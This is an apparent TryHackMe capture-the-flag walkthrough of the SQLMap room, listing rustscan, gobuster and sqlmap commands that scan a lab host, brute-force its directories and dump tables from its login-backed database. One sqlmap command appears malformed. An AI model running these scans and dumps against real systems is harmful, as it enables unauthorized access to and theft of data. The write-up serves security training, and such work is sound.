SQLMAP -TryhackMe Writeup
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Task 1: Introduction
What is Sqlmap ?
Sqlmap is an open-source penetration testing tool designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications. SQL injection is a severe security flaw that allows attackers to manipulate the queries an application makes to its database. This can result in unauthorized data access, data modification, or even a complete takeover of the database. By automating the process, sqlmap helps security professionals efficiently identify and address these vulnerabilities, enhancing the security of web application
Task 3.SQLMap Challenge
Started by running the default Rustscan.
rustscan -a 10.10.130.206 -A -sV -sC
I discovered that port 80 is open.
I accessed the website and found out this
Next I ran the?Gobuster?tool to find any available directories.
gobuster dir -u https://10.10.130.206/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
It had a login page and a registration option. I clicked on the login, then used Burp Suite to intercept the login page and saved it as a TXT file.
We now use SQLMap to enumerate the databases for usernames, passwords, and all other data that can be found in them.
To enumerate the current database
Now Run this command for flag
sqlmap -r <file_name> --current-user
sqlmap -r <file_name> -D blood --tables
sqlmap -r <file_name> -D blood -T flag --columns
sqlmap -r <file_name> -D blood -T -C flag,id --dump-all
Thanks for visiting this my TryhackMe Walkthrough.
VRIJANANDAN KUMAR
Senior InfoSec Analyst || eWPTXv2 || 10x CVE ||C|EH Master || OSCP Aspirant || Bug Hunter || CTF Player || Security Researchers || Pentester...
9 个月Keep it up